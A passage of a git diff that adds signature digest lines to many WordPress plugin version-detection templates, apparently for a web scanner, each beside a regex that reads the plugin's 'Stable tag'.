a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index 7aac0a153f..61d1ee5459 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210094ab14a309f783334e52f957b2c6b7b4562081cf3b1019369b6dd01309ee8bd5022042dc34231b79ef6999ea60c3ed298078bf9cafa9ecd4ae058ba215c6768f9552:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index d0cebd5316..700acbf55b 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ba569b02121fa7aedb1ad549c854ed55780fc91a97e83adcf7a807818c0470e60221009a3c9b939ad6a4e7a0121e9cc371130f8ecda1f1de4bb54c6667350b0034a30b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index ff20779157..2f717aec59 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100bb4339262e2b0bb2c984e13e898a11237bf25b01f882449fe12acc1f45835f4202200e6121ad5d36ba02e9731b5e62c1c997dcf517b1098ed05c1f2974ddfa312d1e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index fffdc7d017..9d2078cc0f 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ee0f0aa68b175c07bb72442f2cda7d8ded3af1fd6b30b781c17a39a90270f330022100f17318848634f978110f6956110101693811ee5e1d63f1127314dd0d70258d18:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 7a9746a70d..09784113a4 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022015d1de6748e8a7e3fbf8e263646eaf4a7437194bd4632f27d477d7d7fd2bafb8022007d8f64d46bba345fe3fda4482ed3c901ff27cc5850133a3eeaa8818596a1482:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index 3fe86debf5..31dc3d1929 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206c9bbe85465b4cf210d0e9d29b13ea9c38ce6bad14ccdbd6d36082bebe19939d02200ad1b63d6015c1d13b364ea3dd519b2ea1e988c3d229d6f32725bc864b56409e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index 3deac58709..0f55259542 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202807d7ea3afebd66ae5159c757345783e2afcd44d8ecc6e8bc4bd529b4d3b26b022100a8a803b19bde035ce9211378bc1b97794c07032e1c5276a103e70b699d9867dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index e7e7c27682..fdafa134b1 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022075b36fce6e0b5c91c4bf083bf9f12ca1158d5458cae4b921e5df05d6ecd134a60221009edddf2d82f65b8d2f1f33a030d1d52856338f0ab10bf519930f2d3c455cfd5c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index ad4ebefa4b..ad92475239 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100fed5c074304f2c25f9a65871cb950fab95296df028cc2b2fcb45e603082df7ac0221009e1bbbf60f165105690bcf44e7ca2043186cb908cd64b6b05246c0c504349a2a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 8e88c81c0a..2fdd779b00 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022021c8ceb63da221a1f9e015e3575d7eba1835d019f8a8412f00d602923091c404022007837b8090d7e70ff254abd35427e3eac9d97f4314a0cc8618b643e85ccf4d62:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml index 39d269fb85..f57eeb2c83 100644 --- a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100dd6ba31acd4647c2731a98d8185c01092158faf66fda3f1411c428751f16ba07022100d63e6a4207f6aac01e5b78f644d29daeaf6ab9d164c794490eae8c7253d97195:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index fc126d83c6..76ad03f943 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022039d75150ccd828fb569943d909756179cf964f5b6f0614990e6176641400dd2002203b5122523f9db6d04fa2226a898686c7461068404fd3b189863488bf63488323:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index 8c49a34259..484c39f088 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c6194b80c6c247ff1650f8cf3ac2bbb4917208d3dc306a763fa69f5b9b94b4e3022100890eb6299c68ac4f0e2dfd6effff3ab8599d8523c77ec28f6e3481e306011e16:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index 6ac2212b4b..54ab4e260b 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a92ad81001907ad4fc8269f1c66bbbe612d25b02b759378ba69b2e3066a7ebbc0221009eb34a2615dcaaee0c9b3c691ede65310acd486ae5155d9f680299f235652d53:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index 71c71b5ed1..18cc34549a 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b1beb4684ff72a3c26a8679d5a614a18b331aab2204ab91c76a9a9b8773d7f6c022100e6716ea28739cf44947a0eca3dc8628339526a7a93a29cb1566d2d8a028a66ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 7b47adc274..5a007dcf68 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205cf0ef143cc14f2d797c9c2fc4db3036b877ba5afab77ba87c1b86e951487eb5022100ecdc0eea898bea50512ea0d5704fd6cd23425573f8d00f4b983a25368ac2dec9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/templately.yaml b/http/technologies/wordpress/plugins/templately.yaml index 286dfdaec6..30157301c1 100644 --- a/http/technologies/wordpress/plugins/templately.yaml +++ b/http/technologies/wordpress/plugins/templately.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202f4b0eabd8fddcbb79b950f06f942c643754240a74369489eb61d8a8eddc607a02200758057da50ad5531e5bca0f02a07cecaadbd6f731aece531bfed03aa411bc0f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index c4928059f6..c024321503 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f71554852634841210ac763ce5a9aad44b2d69afeebca67f61c66be5564de733022100c45a085f4e0b5460b97783af86acd862646ec095039539f2ca6c5ce8ae0ddaea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index f6a7836f35..6b31d01412 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a12414fb231a495fedca989f7b3c54914478684a9c8ecac2b9fb3300c7d47df6022100de0bc6bb086e0120933146ad0a0b72b5c8f98ad30fecc02f576667f79a5b871a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index b7af708c4f..8d958ade1c 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221009b107b174d1b8f9a2a6d7cfdecc797d83b44e5c3bbbc02d90f161f14b2593c5a022100e1a2ff228ffc317813e812b6f3baeca9393b5bb322f59f130aa72b16f1c01eac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 61a793edf7..1b9addeb07 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a6128d54d82be043663dff4f972cfdfd3cd137f27fe4e017e160faf370a134b6022069e7cb92ff82136bd0d74b7414ea9c4439c41ecbb6a0fa7b10ee057951371711:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index 0da88d5d3f..ff3092a464 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f2dc9757e45fc695027ab663b452277610ee7e139b6aa87696a4db093568bfa8022100c1d666b25a8b97cac7335fc2f6a7044403012b839d005f7f40fd5c86facfe7c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index 2b29428cf1..9217f4fbd5 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022036059f66da261c2a8ee71727f24ec782ff1fddda5b44d4bbe8b78c8b4690a4c6022000ee47c57e59d3ad649548dfa85e03c8d966662767b170ca0d8f414773ec2331:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index 181e619a7c..535f97e491 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210080f54bcefacc6cd94d98466964a2bf71df85edfb13452506f4ff38d87032d08502210084afcb8351a98658120c63a4045ab2d220c6f158d6f59f2eba31524e7958b9e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 8164eb4483..add53c2d12 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e0c66f7ec989ea38743245c2f0562ea776d8b3829b10ef696485cfc12b7f4481022100c19c5cc82cacd0517a4bbd102de31d6598d28d57b4e371cce75ab6cae2fdd10e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 59554defdf..a337f3bbfa 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022047b57340508068bd2ffa0631dab31f7c38b5877ccab05ede996160e4f20fc2a802201e6e22f8ad2bf9244f615455a957e6d4763b8f963a00778a9b1aa85255109e3d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index 350fd9436b..f96bbb948d 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022019a0c6c7eb2f133a83e8f199b08e06457969b09eeded920121d4e5443aa92a7102200093827b0790c9e687d5a8374f942ba41a426169bb0a4f10af8bb30a75f39c1c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index 2ae6bafbba..8e4e114dab 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203c94e73033deeb473ea998f051666deaa737c6c395f527541deaaaca7e64b5cb0221009dea8218ec6c5d06c7d39cb092ced242945a5fd3e42e6ddd42eba3de7d860508:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index d0dc8d92bb..92f53b09ff 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220756be2ca6c9541d3748420a86867c7d58994c65cfebeb14d16a2e0334a79e01e02210086d631906b7c1c3e9f906d7620e63886bb31b0f1ad2502cc9c1b920a47a07952:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index c49bbc2b6d..e6e1027716 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202afe1d73e46ca25c8904e9f623cd2c130262e20ee3bf754ee38211cf82a3d22c022046df4687cc95a47744e9efb5c1627809f6cb905136d53667e544834dd67fedd9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 27586cbd9d..eaefc0250b 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220493556aa99680e9885a078404ec0512feec63711cf8d5f7d3b550d21742bde37022100e89f0393ff67ee0f2ee699056e63b9f99267ed11c82fa33c336d28c3125b4d3f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index 946272f0a9..5918066ef7 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204656517e139fbe20cf954bb143fd8ebf6efbaa219352a3eb83382c3d1fb8f27202205aaac9792ab9b57fdfe4e564e5458da04ae4e936c1ef8ab30ca790894ee96db3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml index aa29706872..179d94e3e4 100644 --- a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203d0e94f0362b758a37c28342cadf8a1229248d7171067ffa2ff273e62c05600e022100c345d6f1b379f741a3e638bbec4dd51969f9f7a153233ed1a29432b85eb8bf1e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 290d53ab7e..3b7017d237 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100fc715de8496e59600ea5b5d35d6468143b39bd54adc3b1fe503a0af6416a8e17022049ae046a19a7915d07fe18e6999211192df69c3389a36317302796da02b8562a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index f7c9ef9b1f..137365fe60 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200cefbf547ab03be08641d3bd631046ed0b1fdbf5f42cf84d9e2695d67ff02b68022100a5286f2e5be8756cd5709596c327cb4848f8ec6ec40723be370d413dccfbed02:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index f1c16275a2..7d709de01b 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204af38208f4f48684e3908ea141ba53bceeae4802d5a769f512d82fa9e4b0df0d022100cdc3231fef1d2619470266c0c9d0c970dc3ed67060088a71138ac813c60ce676:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index fc072e19d8..430a651a0e 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a007ad4c3e170e5e9724c784f6858fddfc0de0123f3714b25f98dff5fb02e9320221009b223fff05305f3d6623c0d5cc674be99bdd351f52f55b9c93f38e44cdbdcfc9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index da9df0e8a5..4ec76ea793 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220236c946c20bbb3d29a33d255e08e0e81e0088cbd4bf4d915df47cd0a588b187d022100b13009ba9046677c99152deb3e02a0cba8546f9742628461a647187f048efaf3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index f8113d9750..667c4da047 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203ce994997bb563fd17a8c5ee7692bf88a56117474297eb6e584d8179fedeaeee022030296cb670ed8f79587b71bda24a63f3a1776623ce7e53cabee62dee365ceeb4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index 5f80282ab2..e34e129f76 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022071babc52c0b5083daddc8433173a41e8bab7e39f3b2046995afd845a8741c1b202204996bc2ae7811dbc5a45217bc1fde9d01161757bff3911af637dd87d5b3cf711:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 5725d5bb3f..45caeebca5 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206271e05293f7789b913086fe9a6bcbceaec54a582474d0561482bc8c55b9656f022100e8698941f8d777145d70f46129410d1bca5d60aaa4e07b6ec6d60316bf2ab7d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index f67a8bc18a..a752a4eb84 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022051969c33ac2dc32425b0f72d97b3b9063b23bd1bed94fd5328b48ab41d4149ce0220287139401188663d022d125d5ee87bae597f5c2040ba17353cc0737f2767515c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-crontrol.yaml b/http/technologies/wordpress/plugins/wp-crontrol.yaml index a773829b7d..0344648ec1 100644 --- a/http/technologies/wordpress/plugins/wp-crontrol.yaml +++ b/http/technologies/wordpress/plugins/wp-crontrol.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009214eb5f0714ef7bcf236a9b4a121c119311e77cdd380900d36cbc074d9762c8022015d19aa54ba3017bcf21f6c7fb547c63329ee3599af57359685d29bee6368233:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index b9bd4be0a8..640ffe6cdc 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022016246ad03703bbd7b5e4a95a4e8f63fb9aa353e631331891cad1c838aaaab4730221009099ff3a34a676a47c97c0c9cbe0f5fcb118c4d3c686dcc411489400ee0734f2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index bece4ce486..ac5c1dba02 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c876601936e635755be1639daa4331c47604fc7650f0069bfc01145469620132022100f3b2fbf1d7557845ca8646075adef84b8098a5ba71d43f9b28e52a040b190900:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index 138b0aa9a6..88e604ccb5 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b75d7e19c54b090952f85bf295c71d10e6d1d682f5c1e9243519ac408ab59a14022100f41f4b1073b3cb80f2f492db1da8706a19ae3e8f37915510b9fed7bba31f8527:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 68bf71bc83..546805cd6e 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ 